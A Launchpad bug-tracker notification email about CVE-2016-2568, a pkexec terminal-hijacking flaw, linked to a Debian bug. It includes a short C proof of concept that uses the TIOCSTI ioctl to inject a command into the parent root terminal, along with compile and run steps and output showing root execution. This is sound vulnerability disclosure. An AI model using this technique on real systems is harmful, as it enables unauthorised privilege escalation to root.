This is CVE-2016-2568, and there is no solution to this issue as of today. ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-2568
** Bug watch added: Debian Bug tracker #816062 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=816062 ** Also affects: policykit-1 (Debian) via https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=816062 Importance: Unknown Status: Unknown ** Changed in: policykit-1 (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to policykit-1 in Ubuntu. https://bugs.launchpad.net/bugs/1535768 Title: pkexec tty hijacking via TIOCSTI ioctl Status in policykit-1 package in Ubuntu: Confirmed Status in policykit-1 package in Debian: Unknown Bug description: When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag. $ cat test.c #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); } $ gcc test.c -o test $ id uid=1000(saken) gid=1000(saken) groups=1000(saken) # pkexec --user saken ./test ----> last command i type in id # id ----> did not type this uid=0(root) gid=0(root) groups=0(root) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1535768/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
